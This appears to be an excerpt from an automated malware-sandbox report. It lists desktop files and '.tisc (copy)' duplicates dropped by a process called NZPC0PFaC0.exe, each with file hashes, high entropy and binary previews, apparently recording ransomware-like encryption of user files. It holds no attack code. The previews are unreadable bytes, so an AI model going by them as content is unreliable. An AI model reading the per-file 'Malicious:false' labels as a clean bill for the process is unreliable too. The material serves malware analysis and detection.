                                                                                    SSDEEP:24:mC29UvV3HEwmMrgyC70F3jT7PxxWrpEU1qEGX10T5CpaQ4blJIr6SaHZWfL/gbD:9sU9XEwrhzBwyeQ1foQkJmviSLyD
                                                                                    MD5:0444D71288AC6192BE3A8988D85B23E7
                                                                                    SHA1:AAB82208B307BD7BBA9D343F207B4554C4FBB81A
                                                                                    SHA-256:4B5D4FF13C994993E8BE280D09DA1C1C1FA53D603D767225FC34BF83E3ECA6FD
                                                                                    SHA-512:1CC9B57B2E8C3617D868EEA97DD1ABBC931C90FA2E3EA22F0A83458776B15C7A722A81F40B772C7B3C0984DB3121ED1B73BB79130ED78D0CA0D334594488B33A
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 5>N.3.....:>....`/).yh...8....)v6.i..L.....k..>.n.T..&...g..#..(..\*...d..o.TZ.....T.{..+.^..a6r.m..5!@.W.C1Q^.>...*......!\G.6.M.^D..`E....C..':..D,..M.!....(.@....Q./.0N...Y...._.I...yL...K.A.k....(..1...4c................j_......J.....]..e.yB).R.o......v.dE!.@.H>..4.gQ.bL.".....N...\{5..).d.BY...+..=.j......C~.............+...j.v.%e...~....~O1F+>Z..,...K.PM.TZ.Q`Z.7.H.&d+O......:..x....r..lK5.u.k...5,5..).sKzR.y..l.<_....|..".i..I..szF..$.;0........@..M._...H9.......h......p.....K....|}:~u.......&..?..hl_.YN.{J.(zx.1A.oE..j_..bS../.+.7.....f..i..E.....'.......GP...7k'.#.>+}.8G.X..V5K...V.j{...R.......[..CWZI@.z.i.R......,/?..'....{\f..(.Y1A.0M.....F..x...@.O^.L..~o.:.....,...x...Xkm.,......]h....Ta..fl.`.b..h=:.......3o=.t....~....<..f..F...d@c..._@..........^....X............n..h^..+^A.m.2.p.O..L...\n...T.&.....5y..?....(...../.j.......duy+GR(.5.C........V...-.Q.Y.BV..dC..XZ..V ..$..9...h.Q...T9G.k1-9....a.5.]......D.GH.
                                                                                    C:\Users\user\Desktop\PIVFAGEAAV.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.843253136191442
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:mC29UvV3HEwmMrgyC70F3jT7PxxWrpEU1qEGX10T5CpaQ4blJIr6SaHZWfL/gbD:9sU9XEwrhzBwyeQ1foQkJmviSLyD
                                                                                    MD5:0444D71288AC6192BE3A8988D85B23E7
                                                                                    SHA1:AAB82208B307BD7BBA9D343F207B4554C4FBB81A
                                                                                    SHA-256:4B5D4FF13C994993E8BE280D09DA1C1C1FA53D603D767225FC34BF83E3ECA6FD
                                                                                    SHA-512:1CC9B57B2E8C3617D868EEA97DD1ABBC931C90FA2E3EA22F0A83458776B15C7A722A81F40B772C7B3C0984DB3121ED1B73BB79130ED78D0CA0D334594488B33A
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: 5>N.3.....:>....`/).yh...8....)v6.i..L.....k..>.n.T..&...g..#..(..\*...d..o.TZ.....T.{..+.^..a6r.m..5!@.W.C1Q^.>...*......!\G.6.M.^D..`E....C..':..D,..M.!....(.@....Q./.0N...Y...._.I...yL...K.A.k....(..1...4c................j_......J.....]..e.yB).R.o......v.dE!.@.H>..4.gQ.bL.".....N...\{5..).d.BY...+..=.j......C~.............+...j.v.%e...~....~O1F+>Z..,...K.PM.TZ.Q`Z.7.H.&d+O......:..x....r..lK5.u.k...5,5..).sKzR.y..l.<_....|..".i..I..szF..$.;0........@..M._...H9.......h......p.....K....|}:~u.......&..?..hl_.YN.{J.(zx.1A.oE..j_..bS../.+.7.....f..i..E.....'.......GP...7k'.#.>+}.8G.X..V5K...V.j{...R.......[..CWZI@.z.i.R......,/?..'....{\f..(.Y1A.0M.....F..x...@.O^.L..~o.:.....,...x...Xkm.,......]h....Ta..fl.`.b..h=:.......3o=.t....~....<..f..F...d@c..._@..........^....X............n..h^..+^A.m.2.p.O..L...\n...T.&.....5y..?....(...../.j.......duy+GR(.5.C........V...-.Q.Y.BV..dC..XZ..V ..$..9...h.Q...T9G.k1-9....a.5.]......D.GH.
                                                                                    C:\Users\user\Desktop\PWCCAWLGRE.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826514039643713
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:C3zxFMBiVr6LASFHHYsy0Iim38H8ZtrE+wAzhP9f2+caCwPB7hgbD:ctFMUhrSFHXyxA8br1zhlf2HaCiBUD
                                                                                    MD5:EF39104F7422B1D2F5F315DC00BB83D6
                                                                                    SHA1:0E2A8CA1D58138AA0832E107F43B2C0D5A033CAC
                                                                                    SHA-256:A1625566A3B1881DADC8EF12E4CEDD842781AAD61262454D27810AEED364E310
                                                                                    SHA-512:93916495D6F10DC2E9901E046570B4CCE4526B8B1783FE58EB48769BBF81054062F20F39FB9C22A0428B1853DDE1CB0C2B56309DEDCF77066FCC8CB0532647D0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .e".l......v..Q....)...r...~.....Sdw..Nf( .+..N...Y."go.Pn..m.K}.K%..o.G..].*b.%....6..N.j.+$X......E.tR...c.[>...CB.....`..2.;!{.Zn...i5.V....L..A.,.IH..A._.{%.+w..!..wz.../...'..\%..g.2.K..?k.....Zr.$S.HD6g.....5..X..K-...b7.>.l.....O.C.........?.....6..%O....... .L..6?....1n>..F......p..P.2....s.?.R..9...iP...w&...j.8.3...)....gM.8....`.E....4...{.....3..B.....o2....o..+X-1"..D..-..y...*1.......!.u........u..>A......yt.....c."./.#...K9....n(.+.0|.\~.r1h.....s.....r...mW.....:.S.|.....I..7u..'.@2.~.n.?.2.g/m....(.v".w.[.....l..`...ag:ENH..e........9.u*..y.~.Q.....z..4.........kg.5o]..%@...>....g...Fb/..a.....%.d....-...Zx.c...U..i>....o...o_\..g...9.K..M_.oL.t......Z.......Z....h..o1LR..V....Y.'1.1.....x!f..q...|..I...[2r.5...1).M0..K5Z.....qc.zWs%...-,7+K..b..,..R.-.a...b..b.";g....T..B....B....~.....,\...w.z.v.=i...q,^{o"b....,4...#........t..ew.m]|.%....C.../1........g.610YS..xiH....me.......`.QS~...u......y.B.H.....j..~el.uIS.&.!:.:l..
                                                                                    C:\Users\user\Desktop\PWCCAWLGRE.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826514039643713
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:C3zxFMBiVr6LASFHHYsy0Iim38H8ZtrE+wAzhP9f2+caCwPB7hgbD:ctFMUhrSFHXyxA8br1zhlf2HaCiBUD
                                                                                    MD5:EF39104F7422B1D2F5F315DC00BB83D6
                                                                                    SHA1:0E2A8CA1D58138AA0832E107F43B2C0D5A033CAC
                                                                                    SHA-256:A1625566A3B1881DADC8EF12E4CEDD842781AAD61262454D27810AEED364E310
                                                                                    SHA-512:93916495D6F10DC2E9901E046570B4CCE4526B8B1783FE58EB48769BBF81054062F20F39FB9C22A0428B1853DDE1CB0C2B56309DEDCF77066FCC8CB0532647D0
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .e".l......v..Q....)...r...~.....Sdw..Nf( .+..N...Y."go.Pn..m.K}.K%..o.G..].*b.%....6..N.j.+$X......E.tR...c.[>...CB.....`..2.;!{.Zn...i5.V....L..A.,.IH..A._.{%.+w..!..wz.../...'..\%..g.2.K..?k.....Zr.$S.HD6g.....5..X..K-...b7.>.l.....O.C.........?.....6..%O....... .L..6?....1n>..F......p..P.2....s.?.R..9...iP...w&...j.8.3...)....gM.8....`.E....4...{.....3..B.....o2....o..+X-1"..D..-..y...*1.......!.u........u..>A......yt.....c."./.#...K9....n(.+.0|.\~.r1h.....s.....r...mW.....:.S.|.....I..7u..'.@2.~.n.?.2.g/m....(.v".w.[.....l..`...ag:ENH..e........9.u*..y.~.Q.....z..4.........kg.5o]..%@...>....g...Fb/..a.....%.d....-...Zx.c...U..i>....o...o_\..g...9.K..M_.oL.t......Z.......Z....h..o1LR..V....Y.'1.1.....x!f..q...|..I...[2r.5...1).M0..K5Z.....qc.zWs%...-,7+K..b..,..R.-.a...b..b.";g....T..B....B....~.....,\...w.z.v.=i...q,^{o"b....,4...#........t..ew.m]|.%....C.../1........g.610YS..xiH....me.......`.QS~...u......y.B.H.....j..~el.uIS.&.!:.:l..
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844491831926702
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:juEiTbW0DBKGCwB1g6Rr2WGaLLO3S1QZQeXqSxWi+ttHsgbD:CEiTBDBKG7B1OWGAUQ0xWi+ttHlD
                                                                                    MD5:8D2A712EBFF1D1FF55E84657A7509B2C
                                                                                    SHA1:1FD30C236DD7F85D35311EC3B456E0F5ACC62F50
                                                                                    SHA-256:11BF35E388A8B9752DDB8E7623889C4B2F82A2D787F0E5DF19BF1D896C780E0C
                                                                                    SHA-512:0F2E31C8DAF88622C8463A91CD0C69804CF2CA28F0D1FE7ED696649C766603623403085F890C7F1297DD673555FD437DC89E6538C0E8B0ADAA09A9E985B11271
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: >..,.3..(.48.a{yLC..xa8....yVP.`s&D.J'..I...?~.M.Cp..Jt..."..#..@`....XS..9...F0....F.w[..bN....0.d..8!..v .....w.e.........+..QN%..{>46f..O..%r..w..hs....."r($.....NF.`.Y.qg......6re..^."...9U..o.'[..h...N..W.4..h...t.M..n|jF..@.Gl.*iE_4F..3DX..D...d...@..w..a.&.wY/W...B.'.K..F"v[..?.i#...J.....[=..@...#...v.........Pe..*..P..f..4....o.{...{...-..[......jf......"...l....xs....\...(......Q..<...9c.....z.N.o}|G.......dss.d'..s....{kAt.fK..+.=?..9..!..#,rT...l...`)..S.G.6..pl._bb$ZN.'.r.K/.~...}.';..X}8U........Ae._.....)W.01...A.....oR5WMu...Y.+Ilx.V....7~.Q..w~}w.=...e..1#B.{.HQTw..gqR.q7...t/_._....T...1l1..&.B....,4d....0u|.f2.k8..?.cI.....M....f.X...V.....L..!.....Nd....K.9...=...>.M.b..9,8v}.R..=P..9...T.3.pn..a/.}R..).......+....S/..[.N.3..,a.4y.y..|..g.......%..,.Q..Z..N....9.yR.p.!.....&.^n1z...y...3.d.7%.eQ.4.j..]....s.g..@...q.gz..p.G..........`..z.{..1..|...5r<>G|.w./f... .........H.Hf.....i~\....B......tGt.ps.u....m4.*.8..\7Z.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.844491831926702
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:juEiTbW0DBKGCwB1g6Rr2WGaLLO3S1QZQeXqSxWi+ttHsgbD:CEiTBDBKG7B1OWGAUQ0xWi+ttHlD
                                                                                    MD5:8D2A712EBFF1D1FF55E84657A7509B2C
                                                                                    SHA1:1FD30C236DD7F85D35311EC3B456E0F5ACC62F50
                                                                                    SHA-256:11BF35E388A8B9752DDB8E7623889C4B2F82A2D787F0E5DF19BF1D896C780E0C
                                                                                    SHA-512:0F2E31C8DAF88622C8463A91CD0C69804CF2CA28F0D1FE7ED696649C766603623403085F890C7F1297DD673555FD437DC89E6538C0E8B0ADAA09A9E985B11271
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: >..,.3..(.48.a{yLC..xa8....yVP.`s&D.J'..I...?~.M.Cp..Jt..."..#..@`....XS..9...F0....F.w[..bN....0.d..8!..v .....w.e.........+..QN%..{>46f..O..%r..w..hs....."r($.....NF.`.Y.qg......6re..^."...9U..o.'[..h...N..W.4..h...t.M..n|jF..@.Gl.*iE_4F..3DX..D...d...@..w..a.&.wY/W...B.'.K..F"v[..?.i#...J.....[=..@...#...v.........Pe..*..P..f..4....o.{...{...-..[......jf......"...l....xs....\...(......Q..<...9c.....z.N.o}|G.......dss.d'..s....{kAt.fK..+.=?..9..!..#,rT...l...`)..S.G.6..pl._bb$ZN.'.r.K/.~...}.';..X}8U........Ae._.....)W.01...A.....oR5WMu...Y.+Ilx.V....7~.Q..w~}w.=...e..1#B.{.HQTw..gqR.q7...t/_._....T...1l1..&.B....,4d....0u|.f2.k8..?.cI.....M....f.X...V.....L..!.....Nd....K.9...=...>.M.b..9,8v}.R..=P..9...T.3.pn..a/.}R..).......+....S/..[.N.3..,a.4y.y..|..g.......%..,.Q..Z..N....9.yR.p.!.....&.^n1z...y...3.d.7%.eQ.4.j..]....s.g..@...q.gz..p.G..........`..z.{..1..|...5r<>G|.w./f... .........H.Hf.....i~\....B......tGt.ps.u....m4.*.8..\7Z.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842463590961021
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:+3GDUPZtsgO4rbSsPIJL6c4IzST6+bXX6YsywMLQg+ftXKisKbloKPDwi6u0VggX:4qwsghPwJ+7bXXtLQg+ftXqKbyKbwiLW
                                                                                    MD5:C79DD3D4FAFE7A284D9BA63FD57E62D4
                                                                                    SHA1:9ED9DCFEBA6E64AFCF47EB7661CA5387E1BB671A
                                                                                    SHA-256:39324561F1A52F36D109A8BD6506D933E151020A3448C93ED2AB392A41BDAF77
                                                                                    SHA-512:50A6DBDE53346FB800571F060CC2D729B3D82E4A1CC53065C44140EA698F0BF7FD9E252DA355D8A4264E1315EE3C1B12496D15EC7815F8C5927B56C50BA00F07
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: =`.....X...rm.oO.v*%....\...~...b...o..k.IQAke[....q...M.I.W.2|.lZe...........O..W.%.tl.[R....)V..{/...g..KL. ..9F.i.3...L-......r....,..:.1..:......A|i...G.<MGR..l..Bvr..[M........Xp...{..'..|e..,P.-`.Q....;..2\S.r...=....gc&...Vwn.#.@....|./W.T..'^...]....Y:...v..H....Z:.1...F.\.......U..9s..W.....#Z.D...f.9..>V...0..=.....!.p..|G...<{.....t...&g..B....f..D9B......._n5uz8rd1..nm..6.3.....]."......./..[g,i,..{.R..!,...~k. .,.....p\....5(.........xU.......#7....F...`jX2.gN5."_...7.b..A..2E.9.o......z.]D..3=...........&..To.....#...,_........." ...o....2.C...*?...6$.9....Ur..B.Xl...u...i.f...0..S/o.|....nr.R]..{...U,z..9.U(.S.._9..I!...$U.w"c..e...........C...........gz..`.f....TG.h.A.Od)d.bj7FO.m.$i....W...P..#......D\.KR]..C.Wf..*.Zj.:....%5.P_._...x....[.ix.|..w.~/.M...;.x%b.8.~Ev.=t.....^.'F.b..?.K.]..B.VM%87.u.<V..R...;.b.........N......4Epdc....z....\...%.wz.....9:.......V...v.V.....x......eqAJ;6....6-z..g.Fa.kcM..7.a..N
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.842463590961021
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:+3GDUPZtsgO4rbSsPIJL6c4IzST6+bXX6YsywMLQg+ftXKisKbloKPDwi6u0VggX:4qwsghPwJ+7bXXtLQg+ftXqKbyKbwiLW
                                                                                    MD5:C79DD3D4FAFE7A284D9BA63FD57E62D4
                                                                                    SHA1:9ED9DCFEBA6E64AFCF47EB7661CA5387E1BB671A
                                                                                    SHA-256:39324561F1A52F36D109A8BD6506D933E151020A3448C93ED2AB392A41BDAF77
                                                                                    SHA-512:50A6DBDE53346FB800571F060CC2D729B3D82E4A1CC53065C44140EA698F0BF7FD9E252DA355D8A4264E1315EE3C1B12496D15EC7815F8C5927B56C50BA00F07
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: =`.....X...rm.oO.v*%....\...~...b...o..k.IQAke[....q...M.I.W.2|.lZe...........O..W.%.tl.[R....)V..{/...g..KL. ..9F.i.3...L-......r....,..:.1..:......A|i...G.<MGR..l..Bvr..[M........Xp...{..'..|e..,P.-`.Q....;..2\S.r...=....gc&...Vwn.#.@....|./W.T..'^...]....Y:...v..H....Z:.1...F.\.......U..9s..W.....#Z.D...f.9..>V...0..=.....!.p..|G...<{.....t...&g..B....f..D9B......._n5uz8rd1..nm..6.3.....]."......./..[g,i,..{.R..!,...~k. .,.....p\....5(.........xU.......#7....F...`jX2.gN5."_...7.b..A..2E.9.o......z.]D..3=...........&..To.....#...,_........." ...o....2.C...*?...6$.9....Ur..B.Xl...u...i.f...0..S/o.|....nr.R]..{...U,z..9.U(.S.._9..I!...$U.w"c..e...........C...........gz..`.f....TG.h.A.Od)d.bj7FO.m.$i....W...P..#......D\.KR]..C.Wf..*.Zj.:....%5.P_._...x....[.ix.|..w.~/.M...;.x%b.8.~Ev.=t.....^.'F.b..?.K.]..B.VM%87.u.<V..R...;.b.........N......4Epdc....z....\...%.wz.....9:.......V...v.V.....x......eqAJ;6....6-z..g.Fa.kcM..7.a..N
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828440360950426
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NvO8LsXQfMhAZR1SLZmLkYJvtvNT2gn0AHn/NwhxZLRWq8Xmrgvs4tRFd0b/8tEQ:NvNwki6ELoA2NT2+H/iqqcdRFds/UXD
                                                                                    MD5:B010A4F1FD84350AB9016038479E711B
                                                                                    SHA1:F2B305B12EF6D05E28137A1BBDD9B098A7FAC120
                                                                                    SHA-256:2BAD9351C5C9F15FE46F3C00C4FE8713002E25DA0189FB24BD87E42534E071D6
                                                                                    SHA-512:4A45DB7A9C1F46C1CB65EF450B10E128A67FD83D0EAF36FC3D8C1F52D1D23F4591075E04645560289E011B34D6EFA5283BB4700294C8757A8A3CEEEDB20E3C36
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...........A,.]..D".tE...v{a.-....My.T..L...T.N...`..r......'.....@,.....O'...."......2{._)x...=.........&;.....n....s.@B.+....{..Y...*pz;r.C.&.~=E~B..... ..M.2..as..4.0L.p....m.z.0..H..R..21...!i.ke.R.>Ln%......q.m!.. y.cN..Z.....]........!...^4..../........k-f.B.X}x..I.y..Ts....7C...n...1....xW..f.?.,..t....RyQ..J......;....+cR.....6j....K..S.<.#=..u..H_..A..E..[....<.X...;.5..tI;....]!.c..V....14[..3U....." g.o5...V,..s..9s...?%.m...DY..u.9...o...l.0........u...:..f.16...G...p..-H...e.cp./..7..h..[.P...Pj...N_.H.{..Ca)a/~.H.|{..T.T....M....m.@].&.k..3K..L...g.!..8.mw.q.......l.|..(~..r..L....Y.CJB.RF...4.g....t..ht$.!O._...I-(...b|.:0(.....).G.e~%...1..4.v{P.F...Bo...s ..qgU....,......b.~...$...,.7...b61.%...F^<$.lm_l.2.:2C..9./.A[YQ.pf..b..1f.E.c<..)....j$..4......g..@1......r5..+I..7(5H...&...G...xs...|8[k'....R...C. C.......w...VY.d..QduX...I......X....+..Fo..8..}..:... ..v.().7........'%...?^...B.~=.t...;..bQ./.._J6.....F
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.828440360950426
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:NvO8LsXQfMhAZR1SLZmLkYJvtvNT2gn0AHn/NwhxZLRWq8Xmrgvs4tRFd0b/8tEQ:NvNwki6ELoA2NT2+H/iqqcdRFds/UXD
                                                                                    MD5:B010A4F1FD84350AB9016038479E711B
                                                                                    SHA1:F2B305B12EF6D05E28137A1BBDD9B098A7FAC120
                                                                                    SHA-256:2BAD9351C5C9F15FE46F3C00C4FE8713002E25DA0189FB24BD87E42534E071D6
                                                                                    SHA-512:4A45DB7A9C1F46C1CB65EF450B10E128A67FD83D0EAF36FC3D8C1F52D1D23F4591075E04645560289E011B34D6EFA5283BB4700294C8757A8A3CEEEDB20E3C36
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...........A,.]..D".tE...v{a.-....My.T..L...T.N...`..r......'.....@,.....O'...."......2{._)x...=.........&;.....n....s.@B.+....{..Y...*pz;r.C.&.~=E~B..... ..M.2..as..4.0L.p....m.z.0..H..R..21...!i.ke.R.>Ln%......q.m!.. y.cN..Z.....]........!...^4..../........k-f.B.X}x..I.y..Ts....7C...n...1....xW..f.?.,..t....RyQ..J......;....+cR.....6j....K..S.<.#=..u..H_..A..E..[....<.X...;.5..tI;....]!.c..V....14[..3U....." g.o5...V,..s..9s...?%.m...DY..u.9...o...l.0........u...:..f.16...G...p..-H...e.cp./..7..h..[.P...Pj...N_.H.{..Ca)a/~.H.|{..T.T....M....m.@].&.k..3K..L...g.!..8.mw.q.......l.|..(~..r..L....Y.CJB.RF...4.g....t..ht$.!O._...I-(...b|.:0(.....).G.e~%...1..4.v{P.F...Bo...s ..qgU....,......b.~...$...,.7...b61.%...F^<$.lm_l.2.:2C..9./.A[YQ.pf..b..1f.E.c<..)....j$..4......g..@1......r5..+I..7(5H...&...G...xs...|8[k'....R...C. C.......w...VY.d..QduX...I......X....+..Fo..8..}..:... ..v.().7........'%...?^...B.~=.t...;..bQ./.._J6.....F
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.857331380680913
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:VmE279RDawz/J7F+Dhw44uogr8rv5BrSeKCF5qJz+1fusZ46gbD:VLyDvTJ7FKLR8D5UeKCF8U1fDS3D
                                                                                    MD5:5B7D97C2A93FC277F74A6A2C458AD552
                                                                                    SHA1:E2FD4668B339DF5306C1458ECE77BCAAF2360B9E
                                                                                    SHA-256:280039571D01DCE14906031D1A12BEA6DA5495C854DE00C47166115FF4F65927
                                                                                    SHA-512:9A3474C28F0D395417A00384365E2100FF5DFB6967D316B30CABE585DFFC655D3DCBD691038F084C7255ABD40537B8EAC79D2B457CD55F38763650DEC9C1E4BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.}...<.......s...J.@..y.....D6...".......o..Ix.t......)...!........~...U..u^...#.g.U...9.hzn.(......P..+...$_.5......6......*=$d._ ....u...|..a......s...Y...........&.!keO=.\kV. b.66v.[.6....O.$}YYa}3.C%..I...Y.b=(.......pfN..<.8i..<.S.R..'...ynZ...A.`u`,.@.."S...U.(.E..:X'U......~.v......../:.f..a........!....}#..z.*W...n....1...L....M....5..e5...AH......3..V:0.n.;.............Y..bn...v..p.p...X..Qa...........j.....:..J!..&p.T...}.~.V.@PU...2x.P7..3v.t....[9.Aoi.4...<..Cq.Xh.9....L$.M.....J...u....[..\.Yqf<...t}1..z....c;s5.t*\...9.B.YRa}6(.6.+...../....m0.r-..B.'..nU....Z.......P9.....j...;..p....^........4....e...\...E.N"..#............Y.xe...@;..Q6......... (...,(..a..*.A....].....|*..W1 ]...Q....Ep7.X.....].P/\..:.....L.(..CB...2..A...)x...r/..Z........$...QS.9.H.VA&y..r......".~..T&.-B.bz.-......S".K]1..lX.3.......;.z.......1...S..-j38.|_.6.c4....\....x.W.....*......WS...|.l.dBF..P.0...^.......u..........)A..w......#.k.T.ZZcXQ.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.857331380680913
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:VmE279RDawz/J7F+Dhw44uogr8rv5BrSeKCF5qJz+1fusZ46gbD:VLyDvTJ7FKLR8D5UeKCF8U1fDS3D
                                                                                    MD5:5B7D97C2A93FC277F74A6A2C458AD552
                                                                                    SHA1:E2FD4668B339DF5306C1458ECE77BCAAF2360B9E
                                                                                    SHA-256:280039571D01DCE14906031D1A12BEA6DA5495C854DE00C47166115FF4F65927
                                                                                    SHA-512:9A3474C28F0D395417A00384365E2100FF5DFB6967D316B30CABE585DFFC655D3DCBD691038F084C7255ABD40537B8EAC79D2B457CD55F38763650DEC9C1E4BC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .o.}...<.......s...J.@..y.....D6...".......o..Ix.t......)...!........~...U..u^...#.g.U...9.hzn.(......P..+...$_.5......6......*=$d._ ....u...|..a......s...Y...........&.!keO=.\kV. b.66v.[.6....O.$}YYa}3.C%..I...Y.b=(.......pfN..<.8i..<.S.R..'...ynZ...A.`u`,.@.."S...U.(.E..:X'U......~.v......../:.f..a........!....}#..z.*W...n....1...L....M....5..e5...AH......3..V:0.n.;.............Y..bn...v..p.p...X..Qa...........j.....:..J!..&p.T...}.~.V.@PU...2x.P7..3v.t....[9.Aoi.4...<..Cq.Xh.9....L$.M.....J...u....[..\.Yqf<...t}1..z....c;s5.t*\...9.B.YRa}6(.6.+...../....m0.r-..B.'..nU....Z.......P9.....j...;..p....^........4....e...\...E.N"..#............Y.xe...@;..Q6......... (...,(..a..*.A....].....|*..W1 ]...Q....Ep7.X.....].P/\..:.....L.(..CB...2..A...)x...r/..Z........$...QS.9.H.VA&y..r......".~..T&.-B.bz.-......S".K]1..lX.3.......;.z.......1...S..-j38.|_.6.c4....\....x.W.....*......WS...|.l.dBF..P.0...^.......u..........)A..w......#.k.T.ZZcXQ.
                                                                                    C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.831021873260298
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:af5WlQRr/sqzRm4+C9nzNdm3Ux+FwjrvShLGATWkgGwO9iG5dP/Nb7gbD:af5/R3f9BdNmSATWkVLH5dPVbuD
                                                                                    MD5:C41FF4BCDE97FDA715643C00C38D61ED
                                                                                    SHA1:178D3C85CE5391702EEFAC2516715A02FF8D79EF
                                                                                    SHA-256:0F0AD92DCABE00DF0BEC7C533F8F545EC79162E7EF93819E6ABE4ABC0F936D72
                                                                                    SHA-512:E0193A24D8E17DCC89B48E3C44605980900CE1179375157BF4F68AFC479DD67FB79E4163622DAB115BD3DD0B38E284A8130AE114D7B1E5D680E7B829394727DE
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ..F$V.c....6:...+.......s.?..C.j......Iz-........e.U..SD....Nm3.1."...:.........:...]b.%mb....0......j.W.-S..zb+..8S.) ...g*.bP..[......M.+.....{@.....c.*uXs-g.E.8g#O.J..z.8.....e.....oE...y...8j........{...87$.M....t..X.Z 5d.B........E.D..~...X'.@.&...@G....GEY.c....t.a.1.w..Zs..w..e.......... y{\..iLG...=.....)`...6.k....4d..[g.A3z.<N...P..j.....1..+.8?...[K....1...l(c.[.g.A...$.S1.i..?s...c...8..0..B....-..Z.n...b.Jl.+!.Q...A....4...........2.f..]G......-.&.....}...L."..Sw..t:-[P.L..W...)..R.4.8..84q=.f.....%.F.&...7.i.V.........,u~.:}y[.K<.......c(.{.E....W.Q...W,t`....I.8<.bl9tC./.^...#.=.....T..b..~Co..S`v.....:...r.X..Q.....\S0}..}.Q.TgoK...1..5?..M.W{.p...b.nV..............\.#J.W.~.v \.:`6b.D.w..(.....f.L.dO.ZA(...a+...E.H........8..<..{..........ih@#..f.%Pp........D..ex.......i..ct..\....N3....GJ..X.(....U.....;..0A.{.K...Y......Di.:r..a..q!N6I.5....] 1.m2......*...M..]..p..5u...UTsn.P......B..K.(...3...q.1...9.A....s.?..
